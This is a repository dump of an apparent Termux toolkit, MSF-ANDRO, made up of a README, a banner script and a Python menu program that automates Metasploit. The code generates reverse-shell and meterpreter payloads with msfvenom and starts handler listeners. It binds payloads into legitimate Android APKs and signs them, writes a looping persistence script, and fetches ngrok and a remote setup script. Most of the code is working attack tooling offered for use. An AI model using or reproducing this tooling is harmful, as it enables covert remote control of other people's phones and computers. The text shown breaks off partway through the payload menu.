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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/) 2 | 3 | # MSF-EXPLOIT 4 | 5 | ![MSF-ANDRO](https://user-images.githubusercontent.com/72663288/134493156-59ac9a5b-3f25-4dd7-9d8f-2462a450f1ce.png) 6 | 7 | # MSF-ANDRO is a Metasploit Multi Purpose Exploiting Toolkit For Termux . 8 | 9 | # Only a Basic Script , Still in Development . 10 | 11 | # FEATURES : 12 | 13 | - [x] Install Metasploit ( Termux ) 14 | - [x] Generate Payloads for Windows,Android,Linux with MSF-ANDRO Automated 15 | - [x] Starting Listner 16 | - [x] Payload Binder ( Install Apkmod ) 17 | - [x] Ngrok Downloader 18 | - [x] Apk signer 19 | - [x] Android persistence Script 20 | - [x] No Ruby Gem Problems In Installing 21 | - [x] Connect Successfuly to MSF Database 22 | 23 | # Requirements : 24 | 25 | * Metasploit-Framework 26 | * Python 3.x 27 | * figlet lolcat 28 | * Apkmod - additional 29 | 30 | # Installtion : 31 | 32 | * git clone https://github.com/isuruwa/MSF-ANDRO 33 | * cd MSF-ANDRO 34 | * python msf-andro.py 35 | 36 |
37 | 38 | ``` 39 | ✅ Python3 Required 40 | ✅ Need a Internet Connection 41 | ✅ Owner is not responsible for any misuse of MSF-EXPLOIT TOOL 42 | ``` 43 | 44 | # Screenshots : 45 | 46 | ![msfdb](https://user-images.githubusercontent.com/72663288/134495315-8c5b0ccf-f0aa-4f0e-887c-3b27eafa087b.PNG) 47 | 48 | ![mmsf](https://user-images.githubusercontent.com/72663288/134496117-29506233-10c7-4921-b55f-1409c68d3c2a.PNG) 49 | 50 | ![msfandro](https://user-images.githubusercontent.com/72663288/134495867-99026a39-2a5c-4683-952f-1e92e23e9554.jpg) 51 | 52 | # Credits - gushmazuko 53 | 54 | --- 55 | ### ❤️Supporters❤️ 56 | 57 | [![Stars @isuruwa/MSF-ANDRO](https://reporoster.com/stars/dark/isuruwa/MSF-ANDRO)](https://github.com/isuruwa/MSF-ANDRO/stargazers) 58 | 59 | [![Forks @isuruwa/MSF-ANDRO](https://reporoster.com/forks/dark/isuruwa/MSF-ANDRO)](https://github.com/isuruwa/MSF-ANDRO/network/members) 60 | --- 61 | 62 | 63 | -------------------------------------------------------------------------------- /banner.sh: -------------------------------------------------------------------------------- 1 | cyan='\033[1;36m' 2 | green='\033[1;32m' 3 | red='\033[1;31m' 4 | yellow='\033[1;33m' 5 | blue='\033[1;34m' 6 | purple='\033[1;35m' 7 | reset='\033[0m' 8 | Escape="\033"; 9 | RedF="${Escape}[31m"; 10 | GreenF="${Escape}[32m"; 11 | LighGreenF="${Escape}[92m" 12 | YellowF="${Escape}[33m"; 13 | BlueF="${Escape}[34m"; 14 | CyanF="${Escape}[36m"; 15 | 16 | 17 | function banner(){ 18 | 19 | echo -e " \e[1;37m [\e[1;31m+\e[1;37m]|------------------------------------------|\e[1;37m[\e[1;31m+\e[1;37m]" 20 | echo -e " \e[1;37m [\e[1;31m+\e[1;37m]| $green DEVELOPED $red BY $green DEVIL MASTER \e[1;37m|\e[1;37m[\e[1;31m+\e[1;37m]" 21 | echo -e " \e[1;37m [\e[1;31m+\e[1;37m]| $blue github.com/isuruwa \e[1;37m|\e[1;37m[\e[1;31m+\e[1;37m]" 22 | echo -e " \e[1;37m [\e[1;31m+\e[1;37m]| t.me/fsocietyadmn |\e[1;37m[\e[1;31m+\e[1;37m]" 23 | echo -e " \e[1;37m [\e[1;31m+\e[1;37m]|------------------------------------------|\e[1;37m[\e[1;31m+\e[1;37m]" 24 | echo "" 25 | echo "" 26 | 27 | } 28 | 29 | clear 30 | figlet -f smmono9 " MSF-ANDRO" | lolcat 31 | 32 | echo -e " 33 | \e[1;33m* \e[1;32m * ╱▔▔▔▔▔▔▔▔╲ * \e[1;33m * \e[1;32m 34 | \e[1;31m * \e[1;31m * \e[1;32m ▏\e[1;31m \e[1;32m▕ \e[1;31m* \e[1;31m * \e[1;32m 35 | \e[1;31m* \e[1;32m * \e[1;33m * \e[1;32m▕\e[1;31m ╭━╮\e[1;32m┈┈\e[1;31m╭━╮\e[1;32m▕ \e[1;33m * \e[1;32m * \e[1;31m * \e[1;32m 36 | ╲\e[1;31m╰━╯\e[1;32m╱╲\e[1;31m╰━╯\e[1;32m╱ 37 | \e[1;32m (@\e[1;33m_\e[1;31m \e[1;32m \e[1;33m \e[1;32m \e[1;32m ▏╮┈▔▔┈╭▕ \e[1;31m 38 | \e[1;32m _ \e[1;33m ) \_\e[1;32m_____\e[1;31m____\e[1;31m┣╋╋╋╋┫\e[1;31m____\e[1;32m_______________ 39 | \e[1;32m (_)\e[31m@8@8\e[1;32m{}< \e[1;33m_\e[1;32m_____\e[1;31m________\e[1;31m______\e[1;32m_______________\\ 40 | \e[1;33m )_/ \e[1;31m ;;; ┣╋╋╋╋┫ ;;; 41 | \e[1;32m (@ \e[1;31m ;;\e[1;32m ╲▂▂▂▂▂▂╱ \e[31m;; 42 | \e[1;31m " 43 | 44 | echo -e " $green M $red S $purple F $reset - $blue A $red N $reset D $GreenF R $purple O " 45 | echo '' 46 | banner 47 | -------------------------------------------------------------------------------- /msf-andro.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #AUTHOR : DEVIL MASTER 4 | #GITHUB - https://github.com/isuruwa 5 | 6 | import os, sys, time 7 | from requests import get 8 | from time import sleep 9 | 10 | class colors: 11 | whit = '\033[37m' 12 | end = '\033[0m' # end 13 | red = '\033[31m' # red 14 | green = '\033[1;32m' # green 15 | orange = '\033[33m' # orange 16 | blue = '\033[34m' # blue 17 | purple = '\033[35m' # purple 18 | white = "\x1b[97m" #end white 19 | redf = '\033[41m'#redf 20 | yellow = '\033[93m' #yellow 21 | 22 | 23 | def slowprint(s): 24 | for c in s + '\n': 25 | sys.stdout.write(c) 26 | sys.stdout.flush() 27 | time.sleep(2/800) 28 | 29 | def slowprint2(s): 30 | for c in s + '\n': 31 | sys.stdout.write(c) 32 | sys.stdout.flush() 33 | time.sleep(2/100) 34 | 35 | def start(): 36 | os.system('clear') 37 | os.system('bash banner.sh') 38 | 39 | def pubip(): 40 | print("\n") 41 | ip = get('https://api.ipify.org').text 42 | slowprint(colors.whit + "[IP] Your Public Ip is : "+ colors.purple + ip) 43 | print("\n") 44 | 45 | def ngrokins(): 46 | start() 47 | if os.path.isfile('/data/data/com.termux/files/home/ngrok'): 48 | slowprint2(colors.green + "[+] NGROK ALREADY FOUND") 49 | time.sleep(2) 50 | menu() 51 | else: 52 | try: 53 | print(str(colors.green + "[*] Architecture Type ⬇️ " )) 54 | os.system('dpkg --print-architecture') 55 | ngr = input("\033[37m[+] Enter Above Displayed Architecture Type ( Default = arm ) : ") 56 | if ngr == "aarch64": 57 | os.system('wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm64.zip') 58 | os.system('unzip ngrok-stable-linux-arm64.zip') 59 | os.system('chmod 777 ngrok') 60 | slowprint2(colors.green + "[+] Done [+]") 61 | time.sleep(2) 62 | menu() 63 | elif ngr == "amd64": 64 | os.system('wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip') 65 | os.system('unzip ngrok-stable-linux-amd64.zip') 66 | os.system('chmod 777 ngrok') 67 | menu() 68 | elif ngr == "arm": 69 | os.system('wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip') 70 | os.system('unzip ngrok-stable-linux-arm.zip') 71 | os.system('chmod 777 ngrok') 72 | menu() 73 | elif ngr == "armhf": 74 | os.system('wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip') 75 | os.system('unzip ngrok-stable-linux-arm.zip') 76 | os.system('chmod 777 ngrok') 77 | menu() 78 | elif ngr == "": 79 | os.system('wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip') 80 | os.system('unzip ngrok-stable-linux-arm.zip') 81 | os.system('chmod 777 ngrok') 82 | os.system('chmod 777 ngrok') 83 | else: 84 | slowprint2(colors.red + "[!] Architecture Not Found ") 85 | time.sleep(2) 86 | menu() 87 | except: 88 | slopwprint2(colors.red + "[!] System Error") 89 | time.sleep(2) 90 | menu() 91 | 92 | def bind(): 93 | start() 94 | slowprint2("\033[37m[\033[31m1\033[37m] Install APKMOD") 95 | slowprint2("\033[37m[\033[31m2\033[37m] Bind APK\n") 96 | slowprint2("\033[37m[\033[31m00\033[37m] Back\n") 97 | uchoice = str(input("\033[37m[\033[31m+\033[37m] \033[1;32mMSF > ")) 98 | if uchoice == "1": 99 | start() 100 | msfbind = input(colors.green + " [+] Are you sure to Install Metasploit ? ") 101 | if msfbind == "y" or msfbind == "Y" or msfbind == "yes" or msfbind == "YES" or msfbind == "Yes": 102 | os.system('cd $HOME') 103 | os.system('wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh') 104 | os.system('sh setup.sh') 105 | menu() 106 | else: 107 | menu() 108 | elif uchoice == "2": 109 | start() 110 | host = str(input("\033[37m[+] LHOST : ")) 111 | port = str(input("\033[37m[+] LPORT : ")) 112 | orgapk = str(input("\033[37m[+] Path To Original APK : ")) 113 | bindapk = str(input("\033[37m[+] Path To Binded Apk : ")) 114 | try: 115 | os.system("apkmod -a -b {0} -o {1} LHOST={2} LPORT={3}".format(orgapk,bindapk,host,port)) 116 | except: 117 | slowprint2("\033[37m[\033[31m!\033[37m] PAYLOAD BINDING FAILED") 118 | sleep.time(3) 119 | menu() 120 | elif uchoice == "3": 121 | menu() 122 | else: 123 | menu() 124 | 125 | def signapk(): 126 | start() 127 | if os.system("which apkmod >/dev/null 2>&1") == 0: 128 | unsignapk = str(input("\033[37m[+] Path To Unsigned APK : ")) 129 | signapk = str(input("\033[37m[+] Path To Signed APK : ")) 130 | try: 131 | os.system("apkmod -s {0} -o {1}".format(unsignapk,signapk)) 132 | except: 133 | slowprint2("\033[37m[\033[31m!\033[37m] APK SIGN FAILED ...") 134 | else: 135 | slowprint2("\033[37m[\033[31m!\033[37m] APKMOD not installed") 136 | apkmodins = str(input("Jump To Apkmod Installtion (y/n) ? : ")) 137 | if apkmodins == "y" or apkmodins == "Y" or apkmodins == "yes" or apkmodins == "YES" or apkmodins == "Yes": 138 | apkmodins() 139 | else: 140 | menu() 141 | 142 | def persistence(): 143 | start() 144 | if os.path.isfile('inject.sh'): 145 | slowprint2("\033[37m[\033[31m+\033[37m] Script Already Found As inject.sh") 146 | time.sleep(3) 147 | menu() 148 | else: 149 | with open('inject.sh', 'a') as f: 150 | f.write("#!/bin/bash" + '\n' + "while :" + '\n' + "do am start --user o -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" + '\n' + "sleep 20" + '\n' + "done") 151 | f.close() 152 | print("") 153 | print("\033[37m[\033[31m+\033[37m] Script Saved as inject.sh ") 154 | time.sleep(5) 155 | menu() 156 | 157 | def menu(): 158 | start() 159 | slowprint2("\n\033[37m [\033[35m1\033[37m] Install Metasploit") 160 | slowprint2("\033[37m [\033[35m2\033[37m] Create Payload") 161 | slowprint2("\033[37m [\033[35m3\033[37m] Start Listner") 162 | slowprint2("\033[37m [\033[35m4\033[37m] Payload Bind") 163 | slowprint2("\033[37m [\033[35m5\033[37m] Download Ngrok") 164 | slowprint2("\033[37m [\033[35m6\033[37m] Sign Apk") 165 | slowprint2("\033[37m [\033[35m7\033[37m] Android persistence\n") 166 | uchoice = str(input("\033[37m [\033[31m+\033[37m] \033[35mMSF > ")) 167 | if uchoice == "1": 168 | msfinstall() 169 | elif uchoice == "2": 170 | crpay() 171 | elif uchoice == "3": 172 | lis() 173 | elif uchoice == "4": 174 | bind() 175 | elif uchoice == "5": 176 | ngrokins() 177 | elif uchoice == "6": 178 | signapk() 179 | elif uchoice == "7": 180 | persistence() 181 | else: 182 | menu() 183 | 184 | def lis(): 185 | start() 186 | slowprint2("\033[37m[\033[31m+\033[37m] Listner Menu \033[37m[\033[31m+\033[37m]") 187 | slowprint(colors.green + """ 188 | PAYLOADS AVAIBLE : 189 | 190 | [1] Windows 191 | [2] Android 192 | [3] Linux 193 | 194 | [00] Back 195 | 196 | """) 197 | 198 | lispay = str(input("\033[37m[\033[31m+\033[37m] Payload > ")) 199 | if lispay == "1": 200 | liswin() 201 | if lispay == "2": 202 | lisandro() 203 | if lispay == "3": 204 | lislinux() 205 | else: 206 | menu() 207 | 208 | def liswin(): 209 | start() 210 | pubip() 211 | slowprint(colors.green + """ 212 | [1] windows/shell/reverse_tcp 213 | [2] windows/meterpreter/reverse_http 214 | [3] windows/meterpreter/reverse_https 215 | [4] windows/meterpreter/reverse_tcp 216 | [5] windows/meterpreter_reverse_http 217 | [6] windows/meterpreter_reverse_https 218 | [7] windows/meterpreter_reverse_tcp 219 | 220 | [00] Back 221 | 222 | """) 223 | win = str(input("\033[37m[\033[31m+\033[37m] Win > ")) 224 | if win == "1": 225 | pubip() 226 | host = str(input("\033[37m[+] LHOST : ")) 227 | port = str(input("\033[37m[+] LPORT : ")) 228 | winpay = "windows/shell/reverse_tcp" 229 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 230 | menu() 231 | 232 | if win == "2": 233 | pubip() 234 | host = str(input("\033[37m[+] LHOST : ")) 235 | port = str(input("\033[37m[+] LPORT : ")) 236 | winpay = "windows/meterpreter/reverse_http" 237 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 238 | menu() 239 | 240 | if win == "3": 241 | pubip() 242 | host = str(input("\033[37m[+] LHOST : ")) 243 | port = str(input("\033[37m[+] LPORT : ")) 244 | winpay = "windows/meterpreter/reverse_https" 245 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 246 | menu() 247 | 248 | if win == "4": 249 | pubip() 250 | host = str(input("\033[37m[+] LHOST : ")) 251 | port = str(input("\033[37m[+] LPORT : ")) 252 | winpay = "windows/meterpreter/reverse_tcp" 253 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 254 | menu() 255 | 256 | if win == "5": 257 | pubip() 258 | host = str(input("\033[37m[+] LHOST : ")) 259 | port = str(input("\033[37m[+] LPORT : ")) 260 | winpay = "windows/meterpreter_reverse_http" 261 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 262 | menu() 263 | 264 | if win == "6": 265 | pubip() 266 | host = str(input("\033[37m[+] LHOST : ")) 267 | port = str(input("\033[37m[+] LPORT : ")) 268 | winpay = "windows/meterpreter_reverse_https" 269 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 270 | menu() 271 | 272 | if win == "7": 273 | pubip() 274 | host = str(input("\033[37m[+] LHOST : ")) 275 | port = str(input("\033[37m[+] LPORT : ")) 276 | winpay = "windows/meterpreter_reverse_tcp" 277 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,winpay)) 278 | menu() 279 | 280 | elif win == "00" : 281 | menu() 282 | else: 283 | menu() 284 | 285 | def lisandro(): 286 | start() 287 | pubip() 288 | slowprint(colors.green + """ 289 | [1] android/shell/reverse_http 290 | [2] android/shell/reverse_https 291 | [3] android/shell/reverse_tcp 292 | [4] android/meterpreter/reverse_http 293 | [5] android/meterpreter/reverse_https 294 | [6] android/meterpreter/reverse_tcp 295 | [7] android/meterpreter_reverse_http 296 | [8] android/meterpreter_reverse_https 297 | [9] android/meterpreter_reverse_tcp 298 | [00] Back 299 | """) 300 | andro = str(input("\033[37m[\033[31m+\033[37m] Android > ")) 301 | if andro == "1": 302 | host = str(input("\033[37m[+] LHOST : ")) 303 | port = str(input("\033[37m[+] LPORT : ")) 304 | andro = "android/shell/reverse_http" 305 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 306 | menu() 307 | elif andro == "2": 308 | host = str(input("\033[37m[+] LHOST : ")) 309 | port = str(input("\033[37m[+] LPORT : ")) 310 | andro = "android/shell/reverse_https" 311 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 312 | menu() 313 | elif andro == "3": 314 | host = str(input("\033[37m[+] LHOST : ")) 315 | port = str(input("\033[37m[+] LPORT : ")) 316 | andro = "android/shell/reverse_tcp" 317 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 318 | menu() 319 | elif andro == "5": 320 | host = str(input("\033[37m[+] LHOST : ")) 321 | port = str(input("\033[37m[+] LPORT : ")) 322 | andro = "android/meterpreter/reverse_https" 323 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 324 | menu() 325 | elif andro == "6": 326 | host = str(input("\033[37m[+] LHOST : ")) 327 | port = str(input("\033[37m[+] LPORT : ")) 328 | andro = "android/meterpreter/reverse_tcp" 329 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 330 | menu() 331 | elif andro == "7": 332 | host = str(input("\033[37m[+] LHOST : ")) 333 | port = str(input("\033[37m[+] LPORT : ")) 334 | andro = "android/meterpreter_reverse_http" 335 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 336 | menu() 337 | elif andro == "8": 338 | host = str(input("\033[37m[+] LHOST : ")) 339 | port = str(input("\033[37m[+] LPORT : ")) 340 | andro = "android/meterpreter_reverse_https" 341 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 342 | menu() 343 | elif andro == "9": 344 | host = str(input("\033[37m[+] LHOST : ")) 345 | port = str(input("\033[37m[+] LPORT : ")) 346 | andro = "android/meterpreter_reverse_tcp" 347 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,andro)) 348 | menu() 349 | elif andro == "00": 350 | menu() 351 | else: 352 | menu() 353 | 354 | def lislinux(): 355 | start() 356 | pubip() 357 | slowprint(colors.green + """ 358 | [1] linux/x86/shell/reverse_tcp 359 | [2] linux/x86/meterpreter_reverse_http 360 | [3] linux/x86/meterpreter_reverse_https 361 | [4] linux/x86/meterpreter_reverse_tcp 362 | [5] linux/x64/shell/reverse_tcp 363 | [6] linux/x64/meterpreter_reverse_http 364 | [7] linux/x64/meterpreter_reverse_https 365 | [8] linux/x64/meterpreter_reverse_tcp 366 | [00] Back 367 | """) 368 | linx = str(input("\033[37m[\033[31m+\033[37m] Linux > ")) 369 | if linx == "1": 370 | host = str(input("\033[37m[+] LHOST : ")) 371 | port = str(input("\033[37m[+] LPORT : ")) 372 | linuxpay = "linux/x86/shell/reverse_tcp" 373 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 374 | menu() 375 | elif linx == "2": 376 | host = str(input("\033[37m[+] LHOST : ")) 377 | port = str(input("\033[37m[+] LPORT : ")) 378 | linuxpay = "linux/x86/meterpreter_reverse_http" 379 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 380 | menu() 381 | elif linx == "3": 382 | host = str(input("\033[37m[+] LHOST : ")) 383 | port = str(input("\033[37m[+] LPORT : ")) 384 | linuxpay = "linux/x86/meterpreter_reverse_https" 385 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 386 | menu() 387 | elif linx == "4": 388 | host = str(input("\033[37m[+] LHOST : ")) 389 | port = str(input("\033[37m[+] LPORT : ")) 390 | linuxpay = "linux/x86/meterpreter_reverse_tcp" 391 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 392 | menu() 393 | elif linx == "5": 394 | host = str(input("\033[37m[+] LHOST : ")) 395 | port = str(input("\033[37m[+] LPORT : ")) 396 | linuxpay = "linux/x64/shell/reverse_tcp" 397 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 398 | menu() 399 | elif linx == "6": 400 | host = str(input("\033[37m[+] LHOST : ")) 401 | port = str(input("\033[37m[+] LPORT : ")) 402 | linuxpay = "linux/x64/meterpreter_reverse_http" 403 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 404 | menu() 405 | elif linx == "7": 406 | host = str(input("\033[37m[+] LHOST : ")) 407 | port = str(input("\033[37m[+] LPORT : ")) 408 | linuxpay = "linux/x64/meterpreter_reverse_https" 409 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 410 | menu() 411 | elif linx == "8": 412 | host = str(input("\033[37m[+] LHOST : ")) 413 | port = str(input("\033[37m[+] LPORT : ")) 414 | linuxpay = "linux/x64/meterpreter_reverse_tcp" 415 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,linuxpay)) 416 | menu() 417 | elif linx == "00": 418 | menu() 419 | else: 420 | menu() 421 | 422 | 423 | 424 | def crpay(): 425 | start() 426 | slowprint2("\033[37m[\033[31m+\033[37m] Create Payload Menu \033[37m[\033[31m+\033[37m]") 427 | slowprint(colors.green + """ 428 | PAYLOADS AVAIBLE : 429 | 430 | [1] Windows 431 | [2] Android 432 | [3] Linux 433 | 434 | [00] Back 435 | 436 | """) 437 | 438 | pay = str(input("\033[37m[\033[31m+\033[37m] Payload > ")) 439 | if pay == "1": 440 | crwin() 441 | if pay == "2": 442 | crandro() 443 | if pay == "3": 444 | crlinux() 445 | else: 446 | menu() 447 | 448 | def crwin(): 449 | start() 450 | pubip() 451 | slowprint(colors.green + """ 452 | [1] windows/shell/reverse_tcp 453 | [2] windows/meterpreter/reverse_http 454 | [3] windows/meterpreter/reverse_https 455 | [4] windows/meterpreter/reverse_tcp 456 | [5] windows/meterpreter_reverse_http 457 | [6] windows/meterpreter_reverse_https 458 | [7] windows/meterpreter_reverse_tcp 459 | 460 | [00] Back 461 | 462 | """) 463 | win = str(input("\033[37m[\033[31m+\033[37m] Win > ")) 464 | if win == "1": 465 | pubip() 466 | host = str(input("\033[37m[+] LHOST : ")) 467 | port = str(input("\033[37m[+] LPORT : ")) 468 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 469 | print("\n") 470 | slowprint2(colors.red + "####################### Starting #######################") 471 | print("\n") 472 | slowprint2(colors.red + "################## Generating Payload ##################") 473 | print("\n") 474 | os.system("msfvenom --platform windows -p windows/shell/reverse_tcp LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 475 | print("\n") 476 | slowprint2(colors.red + "############## Payload Generating Success ##############") 477 | print("\n") 478 | slowprint2(colors.green + "######################## Done ##########################") 479 | print("\n") 480 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 481 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 482 | pay = "windows/shell/reverse_tcp" 483 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 484 | menu() 485 | else: 486 | slowprint2(colors.green + "################## Starting Listner ####################") 487 | print("\n") 488 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 489 | time.sleep(2) 490 | menu() 491 | 492 | if win == "2": 493 | pubip() 494 | host = str(input("\033[37m[+] LHOST : ")) 495 | port = str(input("\033[37m[+] LPORT : ")) 496 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 497 | print("\n") 498 | slowprint2(colors.red + "####################### Starting #######################") 499 | print("\n") 500 | slowprint2(colors.red + "################## Generating Payload ##################") 501 | print("\n") 502 | os.system("msfvenom --platform windows -p windows/meterpreter/reverse_http LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 503 | print("\n") 504 | slowprint2(colors.red + "############## Payload Generating Success ##############") 505 | print("\n") 506 | slowprint2(colors.green + "######################## Done ##########################") 507 | print("\n") 508 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 509 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 510 | pay = "windows/meterpreter/reverse_http" 511 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 512 | menu() 513 | else: 514 | slowprint2(colors.green + "################## Starting Listner ####################") 515 | print("\n") 516 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 517 | time.sleep(2) 518 | menu() 519 | 520 | if win == "3": 521 | pubip() 522 | host = str(input("\033[37m[+] LHOST : ")) 523 | port = str(input("\033[37m[+] LPORT : ")) 524 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 525 | print("\n") 526 | slowprint2(colors.red + "####################### Starting #######################") 527 | print("\n") 528 | slowprint2(colors.red + "################## Generating Payload ##################") 529 | print("\n") 530 | os.system("msfvenom --platform windows -p windows/meterpreter/reverse_https LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 531 | print("\n") 532 | slowprint2(colors.red + "############## Payload Generating Success ##############") 533 | print("\n") 534 | slowprint2(colors.green + "######################## Done ##########################") 535 | print("\n") 536 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 537 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 538 | pay = "windows/meterpreter/reverse_https" 539 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 540 | menu() 541 | else: 542 | slowprint2(colors.green + "################## Starting Listner ####################") 543 | print("\n") 544 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 545 | time.sleep(2) 546 | menu() 547 | 548 | if win == "4": 549 | pubip() 550 | host = str(input("\033[37m[+] LHOST : ")) 551 | port = str(input("\033[37m[+] LPORT : ")) 552 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 553 | print("\n") 554 | slowprint2(colors.red + "####################### Starting #######################") 555 | print("\n") 556 | slowprint2(colors.red + "################## Generating Payload ##################") 557 | print("\n") 558 | os.system("msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 559 | print("\n") 560 | slowprint2(colors.red + "############## Payload Generating Success ##############") 561 | print("\n") 562 | slowprint2(colors.green + "######################## Done ##########################") 563 | print("\n") 564 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 565 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 566 | pay = "windows/meterpreter/reverse_tcp" 567 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 568 | menu() 569 | else: 570 | slowprint2(colors.green + "################## Starting Listner ####################") 571 | print("\n") 572 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 573 | time.sleep(2) 574 | menu() 575 | 576 | if win == "5": 577 | pubip() 578 | host = str(input("\033[37m[+] LHOST : ")) 579 | port = str(input("\033[37m[+] LPORT : ")) 580 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 581 | print("\n") 582 | slowprint2(colors.red + "####################### Starting #######################") 583 | print("\n") 584 | slowprint2(colors.red + "################## Generating Payload ##################") 585 | print("\n") 586 | os.system("msfvenom --platform windows -p windows/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 587 | print("\n") 588 | slowprint2(colors.red + "############## Payload Generating Success ##############") 589 | print("\n") 590 | slowprint2(colors.green + "######################## Done ##########################") 591 | print("\n") 592 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 593 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 594 | pay = "windows/meterpreter_reverse_http" 595 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 596 | menu() 597 | else: 598 | slowprint2(colors.green + "################## Starting Listner ####################") 599 | print("\n") 600 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 601 | time.sleep(2) 602 | menu() 603 | 604 | if win == "6": 605 | pubip() 606 | host = str(input("\033[37m[+] LHOST : ")) 607 | port = str(input("\033[37m[+] LPORT : ")) 608 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 609 | print("\n") 610 | slowprint2(colors.red + "####################### Starting #######################") 611 | print("\n") 612 | slowprint2(colors.red + "################## Generating Payload ##################") 613 | print("\n") 614 | 